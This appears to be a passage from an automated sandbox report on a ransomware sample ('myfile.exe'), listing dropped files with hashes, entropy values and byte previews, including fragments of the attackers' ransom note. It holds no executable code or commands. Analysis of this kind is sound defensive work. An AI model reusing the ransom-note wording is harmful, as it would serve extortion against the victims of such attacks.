                                                              Preview:0.p....*.\..2Cd.^(.~.4........1S...A:k..t.~$.P.+6.I.z.h..0...]..)L.'.../..m..JyZU...P.._...I....=....r.3.Ev.O......y..K.T.TP.....9...%`....v.h... ......DF... ...(ST.... .U...s........%.i.0..\...c.J......?.i..*....a...U(.Cj...c .H..H.a-.....&Z..;.S...c}.......kp.]."..\........i~.)....yY[.\.^n..iK....q..V.o....)....LtMB....I_..3....re..>U!..!...=."H.../.-.d.G...j.\.......p...A,..N#....T.nt./...(.. ...[...%FW....N..RU?......ao..........j....iJ....@.L.!#...J....4..e..(..j.1s....].+.......@..z....;.).>W..AzZkh......cDcuO.....b.>.....C..Z..OO6G....N{.._....e3....m.._H..r.r/he.+.{Nk....K...*.....S..1.Ew..u...GE^......C.n...s.....L.AC>..@.p..27.U...O/.......,gW...".......8s..x..pe..h...L.`.vEV...93J...........g.(B.{.z0..cwM.;.Qzf....+.......L+.(.......YVJ..D..s%&Pi./..V..Xh......O...........r.......N..Q++.g.7.......(...)6R.........o.....{.!...< K...Q...j4.?A(....16e..n..........7d.j....(..ZZ.OI+ZbY.i.}.B.......D....nM +|.....R.-.=..z....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.848400402855792
                                                              Encrypted:false
                                                              SSDEEP:24:Dh+9wLsl/Np7ykxQBjCx6al5LT1XQgfkyYwddCCcs26QeZguXOnrMMjA3C:tL0/1xZ9XQgfYwddCNsf9YMoUC
                                                              MD5:8D1A166BE90558B581F7C00FB8276082
                                                              SHA1:B8DA81D7CCDEA7157789E4B636D27B00B1664D44
                                                              SHA-256:DD71D1C411E59C7CB434B90F1B7C26C34FA52E92D69016642A942024C3E39B42
                                                              SHA-512:ADE39271F551A9868E8FFD4901EEFF289D839F61BC5B7E01BB57333AF63F068D80DEB2665D7480159EBCF72F3A53D720EAD1DAF29913ECBF411588221CC4C122
                                                              Malicious:false
                                                              Preview:.kET(...C...'...S?...V..+.p{.`... k!Q.i..v..C...c.......m!...........\.Q.+...(.2.a...m.A..JEtH?hT.2........ .QG,Y..~\.L..&.,Y.e.+{...#.&.........E..7.../...0.t...9I......$<......(.7]]...I"..\..U41..l>.c... oiv_....jl.1....~..I.'..}9I......mk:..H.w.'.....nF:D.AY.H..._~Y`..b$cb>.3....%a.$e...J.....* .i.z'A.W.m....{..s.......I!:..f...7..\..:.lqDs.\H.....V'..<......Uk...&.....bI.s..V<...|.;..{...L....P.HS...,8J..n.7.!..rP.H.P.UE`V=.UG....I."O.Rr..}.:.:....A RJr.{+V..3..".eO...7..x.X.?n.0.{1.....n2\84.........Y.6+.......Z.....9@t.].h."......!.... .D.9;`. .Rv..7....h..5Y..y.|..VA..b...[+-^..z...i ...U.g...l.mI.1^...W.@..TzM.r;...W+BJ...S.`.qa...R...O.W...D..z.5....1./.fQ.y...Rw.f.!..q.-.........7. z....t.=S....m.c...........v..@.~.9...n.....9.>.@..OLB...6'.....D....;Q........B..i.n.i..........U.S$.#.._z....H....?.,..[c.r...t...K..s.6!.a....J.~....>..+..~..:........_/..|.....$.&B%+.....J...Nl.......a.@..`.Ou...2._=.~..Y.)..R..P..O..jeO..O...x.......
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.843110513162229
                                                              Encrypted:false
                                                              SSDEEP:24:b33jlz/U3besPvvhSsnfO/QKFgFDkXCWYrJ40+Jn6/yuhnrMMjT:bHjd/U3besPRnfOIKm1kXWl40+x6/yAx
                                                              MD5:81010D5D9E1178B769AE0872891A8273
                                                              SHA1:F00683D6656E94D2827B2327B7C1CBB54A53C9CF
                                                              SHA-256:49F37FA8DC8CA992B89339FDEF33394F14BD99DCA5D3F28F6E78E139A0E38BBF
                                                              SHA-512:68DE8B369CD4C00AC8E8CB9576AEEBB7A5EAD62A3A8331551E46B4D5683B3589B58ED2FFB5DBA1EF737AC919233EAB19820F5B4BE80919812C0A587D36055E99
                                                              Malicious:false
                                                              Preview:....... $....;E.*.[.........q.b5..Am+A...........q.["^.|B.&.v...`..3U)....!T....UX..N.....P..}Xc..W.bO.<.;..8F]....F..4....e.5.6...(c...#.1:..@2!%[.........]....o2.s..)......S.E..~..U.W..6.=..St.O...dW...|.]....F..Gt.].N..G..2fi B$...fk.6...0.("...X.;../.2y..!.b.....@..!.t4l.7...a:..N...8.:...Rq..lwUK.9........l6.!.....Bzx.D J....z.G./..DbB5|..c>..d......B.]..%.7B.@.G..Q`......s*...{7.m.....V.....].x^.g..c.....'Z.h,.q)..R.l..M)q5.@y)i~mR.cRH...[.,3.[..{.=.5..L.V\jM.;f.x..N.L.K...v.bW...M.Q.>_-p.o.l.G1.B.......d.#..|.Z....M.A.738k..d..h...Yg"d...\...e7.7..B'.y!i.F}.h.(x....."...E..._..S..0.p...8...6..%.b...L.+.N.....Xl...'....eS.....1$^.'.<.l........9z..:\....^.......d.z.,......C.g............M.......5..G..;.....&E1)GN....{.K....^._S./...o..:..d@.V0..beG.e.Q.Y^.D..`Ic.....vy..n...'....W.....|]G/...).\.\.9.0..@......z*c>...a.....S..$i..T.q.)W8.g.C"......Q(....!geP*.R.:..d.......K....._3X....cA9o.....t.w....k..`?..hR.9*.:n..U....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.82818821415048
                                                              Encrypted:false
                                                              SSDEEP:24:s/qymvz5yyI9Z32PDiuB9EHOzqX+o9ChzI4u0n1B9AYfyvm/6GZuT07gT3A/SnrD:sST2Z3SDi5Hu84u0D9rfP/lZ9i5MokA
                                                              MD5:033251D96A9D46CCD0B8AC4D4E4D472F
                                                              SHA1:AA026D6C438ECC768D04405A2114B116A7FB2DFF
                                                              SHA-256:6412312A59F62B7BEE00C6C945543A63F7C1B11E043627BA00DC1DE9C2FEA1BE
                                                              SHA-512:14ADD3BFF5CD91D9714F555BC53BC5ED42E6C8ED651988CDD833529A5D1CB187B56CE90E71DD13144C734742DE7C7864FF9D0744D74F608F398F872C17FE59E3
                                                              Malicious:false
                                                              Preview:.s...&.<..*g...j.....l..X..0B.....CUe......x../.C.}C..N-}....k.<..x......0.....e.>.?.._....)@Q.......?`..sa..9........$...o.....lW.....Wx........7..$..|..<.^a...4.|qE5...S../F..`...x..|..7.9..*zC.$.J..C.."a7.x.....D7..dU....Q&.......<.....}.x....j9..R..p (i..G.4..j!D........6@.@S.t..-..h..Pn.:..P..$e.}X.,...0.6T3.E..s$...5\..l.....v|......]F~.P.U@....`].._..Cx:,...G}.xtQ*......**.s.../...H.....>...EO...Ev....T.......p...z.j.\....f...^.4.AU..w..........o... .z].Lc.+L...34)p........Bl.3v..|....L.W=..Z%..h.95.E.u.^..C.i..~.S;.e9.lSo'i.VF....1.k..9.:K%..F/y[_f.!.....Wb~..Z..3_./b.&2..l........V-.{.A)....Ua.6.D?....~?o..pG.P..V.}j..8....J.JQ"<...o&/....sT.|....q..LA....#...Kw.o.Dty......R.e3......{.....qX.T.._..E9...X.i..:........J.....ZS.n.......kb......?,jT5<..%.WS.@h}e...".....e...O..@.{._..|..p....$.Q......g...<..V7*.b6x?.......v.H)...>.....h.}..qj%...G.z..0.....PR.K.c7...'H..J]8.O%1...[;.Hsc.q^W..._...xi.........a......M.%Iqag..%q.^i....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.835312757449094
                                                              Encrypted:false
                                                              SSDEEP:24:tq2viovLRtQh8wWplJqTu3MxNqvZEhinKRad2+uKKt81KTK4MbEaXEXIcnrMMjar:tzXzLQmwWp6Tu3aIZEByPukKT+bEMIRa
                                                              MD5:3B37B662EFB7554BF2800E253BD5AE78
                                                              SHA1:183417F419FAB83300EC440032F236862BCE7C94
                                                              SHA-256:AB8450646007D3F8B6513076CC8C80AEB524C12DA3C95CBB0395582A44C7B07F
                                                              SHA-512:9E45882DE5A827EC29788D2EB06A207E5287BE4CF57B2F1958A7284F8178409495146CDF68DABB35321A02DD7C6048F9DA85909C638837E7615233BAD08C2888
                                                              Malicious:false
                                                              Preview:..d.-wr4..].....I....j.k..M....^*...u.a......$..+D...)k.bV%...&..C.w..T.A..R4.r...B!......Pl.Krm.y`.9..=...<%.(...&....-.....-..`..:..|".%w....%@..'.w....d.S.g.......e=J.#k_2g.......|.....E.rAX..n..u.4..jR.n!s.5w&.U....k|y.R.].f.i|+&.C..[.G%.o...&*(..B@y..=......>z...Y.....z2...z*..H..R...L.D%.jKJ...S..e...R.../H.L...._.....L...h..y..VEe-.i.....H/&..w.rC...FPsH?/...q...n.Xi.O<..sz.C.Z.3.{..|K..?#\Vsm..-..E.......G.o.E.....4.UF...i%h.l.c.BI. .m%.Q..O:.W..A...._.9k..?.e".0..!........Q...@.xu'.X.X_.C.rSq.$.SG..R.q.............Y.u.&......Cb.W...;.!..jD..m. d..aYz.'f1.O%o.b_"T.IL..`t.#>.7.-9.....A.....*[!-xF(.E).fJ.~5..7.F....&...I3..0#.*....WP..q...(P6...1.%Y4.#..y....@...V.CZ..B.Rf.".a.&..Y..J.e....xgJ.S....#.d.......#....%.|2..9j...h...a@...p..mh-.Q.....0......P..o...f...........pj..1..p..?.17*.G;...N..-5.Z;".-...Xb......1.bge.t..=..)...w....@............y...h...v........g..h....{...'y((...c.'.n.S?.w.r"..D.x....0~..&...G3..D>.3........e... ..="
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.872928065513151
                                                              Encrypted:false
                                                              SSDEEP:24:PWpFU/guhyEOtT/7ORctcfgyZXRG1TCcI82/WOIQLBmCgfb/nrMMjlra:PWpe/phMROfNVfcPOLGbDMolu
                                                              MD5:0592639EAA6373CCBA52C70F5BFE6CFB
                                                              SHA1:F875350C4B3132E2E4244BB652598441541AFBBD
                                                              SHA-256:6A368804207E29ABF6B2F10F48D3FCD383CBFEE62332533DC0482AD8ACF5A389
                                                              SHA-512:3A00699AD7EE4A3C8005AC36F345F429188485AD6E12F0311A788636C28FD0262EFB51215696B59DF3C4A1AEC9D1A77463E9698884D3495A5D4AD85A35654557
                                                              Malicious:false
                                                              Preview:.]..5|W...O9&.q...n...s..)..rA...7..`c$....=..7...8.Y-]J.w'...O_p.+li.{....12Gr.....R%.....p...y.1.0..f..<...,.C.,....].".U..{/.`.&.*.nsd.........2.\'1......]4.]....j7(8....-.B.js.4..T....pVtd;G...c..j.U(.)......h.R^B{.Q.,...@a......S..{^`$.O.W. 6Z....`D<.].9.....###...,QS....v3-....e....c..wa..?...W.......4.b^;u.=..J.8...6..L.~..t...gT$.e\....b.Q...Z)AHDyn.....T...J..q.>.*.....V.@../CzOfx.ifcO2I5.Ip...h..Hu./wA..3d..I..U&.f..2.T.....J^E...H.M8>...udw..3.D..VU.5U.9....].z...;.....t..../0.{.~.Dy.%c.Q.R.n1L.@.R_/M...c../.).....a.^d@.......r..DBI..r.h3R..:..N3tM....cs.[.OC..\.I..P...a5?fR.....x.U.!&:............!T...%.J...y...^.:.*....5...$..)y.c./.Oi....,.u..#.... %}W 7..6.....X4~...i%.b%]<5".."6....p...$...9.k8,".,...|...L....lV.5'=......`.B.Q..uT..[..t..H%i5P...'r2Mxs....mO.......o.g...@r...`Y?JDsO.?..c.j[..n.......LK......S..n.....=....I...[....X....).S...'....=...:....o......^._g.....ZJ<EL.;.z...-.v...).=.>.m.).....n...F.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8419605135805694
                                                              Encrypted:false
                                                              SSDEEP:24:fCpUKXi3lNPRb5lJRW0FUvosnLGf2jwmeCte/Dzax8VmkU1bEnuV8nrMMj7qupG:bdXPRb5ZW0QHLGxCtefVvU1VViMo+upG
                                                              MD5:904FAF3106B686DB010A43B956D36106
                                                              SHA1:05D43A2269E0540752A9406860194324BB737E4B
                                                              SHA-256:2F7E151FEA5FF41314E1FDC61F935F1DE26B24EAC017758F3724257B5BCBF599
                                                              SHA-512:5C44529385E529F96AD302A4E870B87335FB2E7244B88DC50A984E3FAB665684BF3F0DB96326D2AC57BF63164B4A6B5A897B07DBC98118DB1343E7C5DCBE7D33
                                                              Malicious:false
                                                              Preview:7../Q..X]u...&N..3..{G..F>uO.<...v:..E........+.BD.iP.n..t...u....C..pS-q..?.U.1..Z........a.IqK.SWL.Q.....Y....96$!...B.r..S.=..,.......>.6.|:.+.....Iy..O>...Q^.....z.....gG> U..X..a.........}.r.......d!......o...L&....H...m.....%.(..'{.^..].E.....d..<.Xj8..^..:..-..y.....(,.yaB.. .\.i`.O....qZQ....[..t...7S.Q5t.M$....Nm.?.G.Q..b.EW..qe.......l?.S......E_...[s.3.......}]u........j..o..1a.Y.g...f.d...>.yr....i...?.....}.......9.......^.=....'bd.1.....9x....5{S.<....S..2"p....h...".{...:.#.../Y.m..Kr.-.(...........nu.6..,.t../..K.:.}.|..rm.b>d9F...D.,..Xbs...(...HT.._......:.3......$.e.p...7..\]....-../....?Of.W0...f...k.>N..;/.:sf.A..b.%......r&7...b.....L...!...#...^T....Y.E..n.......m.>x....T9.Z,....}..ac..Pm.@..#m......_B........QS..q.hi..;B`J.[i..9..E.....H..1.....K..c.M.A.U.T..|u.4.../...1.9EHQ..D..i...w.o.o./.[;^...4."T8.5..A...w@.Y...,A5.b@...gFf.y...|.cBn......j..8U..!$.%.vs{...+.%]..*q..^...=./...l...%2.-..{.L.!(.S[.~...[....T.]..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.831817141555728
                                                              Encrypted:false
                                                              SSDEEP:24:aW+ko7WRLZF81zw7xTexjA+IBei2UzxIPIBUwnrMMj1A4:aRWRdF81zw7laj/IySxIPi3Mo64
                                                              MD5:6CEBEC67D2B1D58B8EFCC978FBA724A6
                                                              SHA1:7F321F09A0C406EBD98B9D395FBDCE950BB68FAF
                                                              SHA-256:D3BF227B5A98CD3694903D8655591E0774EA727771145DC5E9531C2E1BED6250
                                                              SHA-512:282EC504AA2855708DE8FB747AE82D1EAD5CCE075484238F311FC0B1726E901A468FC7EB668544FAF79C705D71C5B3B045EFBA062310B768C605115A797D338F
                                                              Malicious:false
                                                              Preview:....(\.-......m.....k=@m..e;\.rH.{%..$....m...>....#..*![...4......}...U.........p..!|..N.]. .|..hl........t...N+......t...=....1X..q...}....h.v.w.|A.8M6.......l..B.f.P.....'t.A..&.Z!aj...g.......5.zd].?....V.3...>..+.==.*...J"c>...5.q....\@.B+..1..=....<\.%.B....S.E^..Z...Z..au..MQ3%.SN.(3....\6...y.....9M.{?G.... ./.,....9.K*=.....G}..P..}...n...vF=6A..x..^".1.u.m..T...6O... l...?..kld.8l....q..wg}DT....XI...vm.....4:v.....].,h...+.W...r}R.....$v..hM.<w...........'..!2Q...+.-c....[%..$.Sq....."..oc......`.........U..V.p.$...%.Ls.0..9...c...8ss\....m.T....T..(j...B/.~..r..V.0n...M..6.....sT...)q..C...?..,.n...F._6.v....g!..0/.]....*.RO.j....."..VE.`...VZ..l..7.DlN..5.[.d).....|....9.....p,i/.B.......Ji...`....2......F]..0.d!h.8...|....!X.C..U[LP.[..$......."....{.$..F..x._oeK!.>..y].n..)......sTL....;.... ......;F|.t..us....].<s..x...._.E<..>....x..syuy.j...a`..4/x.2<|5]...n.Q..WqW.n3.....E..,.J6o!]5.UEfB........9..(.r.h.....\.!..C.Oe....9g....)B.I
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.859159670781214
                                                              Encrypted:false
                                                              SSDEEP:24:RURmFpuiZ/6O3TKn6r67eSKy65VH2JdA1/gUXAHNb5D7m/nrMMjosw:RUsei4kWj7eSh6KJde/PXsrPYMoob
                                                              MD5:059EFE984722D5681CF5061CB9725D28
                                                              SHA1:935C3254897DD34C5CAC3F686D63E7CA8AA372EA
                                                              SHA-256:A841966A068F70CD7C917593AD58C05B0EA888F560C168204ABD51BE64DF3A86
                                                              SHA-512:A5C9074C845312203DB0BA3F03598355749503EF0F49F5A3CB0D33DF339B229DE5060296C59E66F4D07211ABD76A8159040303FABB0CED475A596A02A49D6A5C
                                                              Malicious:false
                                                              Preview:.-e...[......1..f..r....L...r.o.^.<u.aL^<...7.m....R...Gt}=....V..w.;:.u5.w.'....F. ...r..=.....de...11.7....J.0I........Y....x.|.:`..%...s!c.yG.J.C....AC: e0..0...../..(.......2...b./.wXeZ.[.$......3....~...Eut.,u.~..e5..'U.2...>......G.n.....\.Z..w..T..........z(..@.w.0.w...c.;h._..B...DE........].....x..;.w.*....uX.`...RR.. ...i...3..?;.A.V..Jn...=!.}>....b_..oA.u..nQo...".=i9'V.}.K..|s..}...:d.s26...4....a........R...Fba.-ksfw?..5zx.VU.J.7.*...$.....j.....x}%H7.)..i.I...\..x...Z.H.....v[...[....(..*c\r.b..1...d..t.?.....PauR-qn..h...R...U.YVM+XS(.Ae.=..].....6...5......;......G.^....>.F.JW..s..=>.hU"s.. R5....e.R..x...6.....\...z.2L.C.j.$...A.)..%..9..d...Q'..NV..;.-m....A...>qy..5]O.....S..W..,.......Z....2.....+ .......(.(.....|>.RV...<:H.W|.r..8.w...I......{Q..g..9...5.P..P......Lx'..2E.v.....0.f..9...&.."..g..h.f.....K<.[...I..W..N@...PlN6i/...L.....Y.e.Z...Ig}....<.... .#.^.j..^..$....&.7Q..[..M..z..%v...'......g-z...
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.833482360241333
                                                              Encrypted:false
                                                              SSDEEP:24:hoVXmUuezXVFFGnennrzDIP82jXC1110gEqlr7dm38qZFFWWCvUlRr/DnrMMjEXl:CVPuIXVLnnzl2LC1v0gEudmMqn83qDf+
                                                              MD5:7FCE1506D5C3E0FDF86C3B2E404062F2
                                                              SHA1:04F3919BB83BC93F6927BC12E1B232C516CBF807
                                                              SHA-256:5FA8821D77B63A4E714172519171202CA82E5BF7C53BD19102B75D39AF5D5CF8
                                                              SHA-512:2B2569DFA3E1BEEE839C16A09A2AB90DF12E3F9AA51788DAC17A562CA6C4B89D12890FB2AFFE6007A729CC6C437B6476A866AAB34A72881E7B16B4B34C1CCF30
                                                              Malicious:false
                                                              Preview:.w...X.=.~..Cy#,...L..d.....p.........w>....G).@".).T...;.O....|t2..5.8=...........w.kJ.cnPk../,..(.:k...C.d...Z|.U.9...:.E...)F..Z.rR..z>.\.......@..su.......!..;z;...p.....>.P#..e.X....].3......F.........U..kg.w...........d^++..-bB..1..\..G...#k....Bsm'7d..[....t.Yll...p:... .c}x..#...sq@1...3.W.(;.{-.o{9O..T.H..J..Gl....%E...@.CH......_....y.Q...!.....!e@C.fTJ.R.X.[^t.o;...........>s7.Da...(....s..n...o...s.#.....J@..Np..r.Wt.$...D.fw..].P[....1..F.).QV....Y'.TF....FmB...q.DBl...=.4.(.O.s.8"@......Y.rv..]...x..C...`.1.....%.6...A..b......C..:.I..y.C..t.M........C..-....Z....J.f{o.=.....<sK@.N...s..l...!.m].WN vl......RN.x.^X`.._....Agc._9F"......$.A.m=^..dfG[...'o*)z.1G8.*dP)0n...Y.7..]b.+..V.....N"..H@g .L...B .D.x.8(...8.WU......d..W.w..'....[G.N|ATA....T..<.H*.>.)..........J.S......a*.f?.S.....3.D...5.......f;....\.Q....{..A....K.5..........'.W...=2.Q.ma..L.A....y5..........v>\..a`.v5.LV...g.D\O>x..~.f.kt.dC.....HHB...5.Q.i.|
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.856062841311907
                                                              Encrypted:false
                                                              SSDEEP:24:1yORNwXzjKS6oW7kcv5urBtQjGxwQCuIIwPMRvgJHMOFCM/uIhnrMMjKhG:EFHjG/5urPQbQCuIkRvlOF1mI5MoKQ
                                                              MD5:F0BACEA04E80D8F4F366350CF9EE2251
                                                              SHA1:5656614EB0C1F0FCCB431F8F3141FD5E5E7352F9
                                                              SHA-256:39AD392AA18A92A61D789A59761FCDF20D6CFE0C5FA75AD18EB6E6980579A468
                                                              SHA-512:2AD25418501F06AD26A3E6B1C2C3563D2C59DCD67DAC60C479D8638DD0F8FEBF1C39DF98A9238625E549C342DD5FFCFEC81CE548EA96E9D43C134B274E9A7EDB
                                                              Malicious:false
                                                              Preview:.=...l@`....%yQ.B.....1.....{A.PD-...................+...*.M..m.n...u.rm;.A*..i.3:'5f!8..H....I.*t..T..v..=....;.Z.%.&...4.O...@ {.F.M.........&c.{.B.;..R3.~..6..dSfS<.H.^L...2..O.71.qN....(.f/...X.....A*.5m..1$C.p...OZ.<......~I..G^.."l.#}.uo..L...v.l../.....G..q.7=..IM......o....v.S.J..6.'..*A...._.j.4o.4M..A.#x.?|.*.V...FpF>!K....|(..v.............'.S..U...zsh.1...K.....r......g#.c..l.'5.g.........C".a...q....:#..?...I.U.I3)P..i..s.....R".....H ..R....?r..5.;.\x....g.nS.l._Z!....... ..jH..#O.YG.w.....c.|XlU.1W.~\.>G.tM._h....u.."5S......&Bu...G.h.j..T5#.%-.[=..."-..s..d..u...H.......5.#F...IUR.>......!4....L..s...g....6W..e.................i.....M.La]..I.....4.... .....|!TP..#..o....SW.c|^A.n...F.gFE...>.n.X;a..N..s....kN..2...".q.b#........[.EB..E.M..W/..h.p...H..1....3....m.b.7.S.Ns...Z.A.O.D..h..*h.S.x!N.jb...r.e.7.{l?.n..3......%...A@l...3..u.8.@O.|.1...3.oZ...n;9....D.....E#.>o.uF.t...+6..iAQ..%s..k....A.Z+...z.F%..l...\".q..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.847022643163369
                                                              Encrypted:false
                                                              SSDEEP:24:dBLe8IoG1rWCvtN7rjAS5Ez3THaenJCvFmHOBKnrMMjW3QHgM:7e8hoWCvtN7t4+zNmHO2Mo6C
                                                              MD5:8E7EFEDBF32F1B512C4FB8460E5FB826
                                                              SHA1:74E9F571CF7563ABCFF63AB51F7A586E3C4FE7E0
                                                              SHA-256:75705C7673B9714F813DBAD5CB9CD2A82A529C77D8B63FEC3EC3FBC3BF2DCEFB
                                                              SHA-512:A65FAFB4ECE0C08A87C4D1C25523D695738ABFAAF636D9EA2B5C76FF33BCE4BAEC5E58D3FC7F3424F913C1F31CF70B2C3ECA0E2DC0193E4FAD5954C996AFA878
                                                              Malicious:false
                                                              Preview:.9...(...'..[B..='D.G6!OTOc-.....tskt.g...,.nW.U..k.......S.......[u..~.......B...1.>!|.Y.B.(R...!....]..4\;.d.S.Y|.{r...,..$.up..-..'.F....0h...+..#`!..Q..e.o...#+.(e...X...5._.H..............B.&.z).n..nY..T..6..z.2....s....a.U....L1..%2....R^..J.;z....d.96 .....V........X..4Vn.!.j>.{i..e.5.".Rk..(...2....O..~D..QB..N..:...e.!a..$...!I..i_....G.s...h.~..#C.,jN.,.!7.P.O..=..o$...9.t..p.T...:.....~..y@.m...a...@.....Q....v.wk.r5.RNj...fD4......_....g.o..H.D%7..].A.7....+z...........^..S..E....J<...(x.1H..8q.|.C...@..S&\.}.h7..g.S.........K2.....P{9A|..3...\....Nw........k.j9..$3Q..O.kS......Qw.....<.r.d..(9...p9...Q]..........>.6C[z..|J.0.K.........of........*..wcZ...r(.......<....+\...{.g...G..Nf...S.....1.....u...]h...LU)./r.vcW^[..6.3l...1j&&..,...=.....F.+....." IKoP.8......5..F......./...._~...4N..{O,..0#0G.M.n.K17.b....A.d^~e........;.S......E.....}V....F.~pD....=.........g..WY...|.8....*h.#.'.0........p.ytUR.A.mT<.........9
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.849205930903231
                                                              Encrypted:false
                                                              SSDEEP:24:4Yryj1YmBeMKGH67HUkuQv5SG/3CcFhIauTDbOCwVkyY2RRtzlmO3jnrMMjok:4Y+h30Mgwk3Utc8I3RP4O3/Mof
                                                              MD5:F295F030755DED42033B9E535BCFDE80
                                                              SHA1:4AF6C77674E5794D5E8C07DBA96C4C30B8F8C727
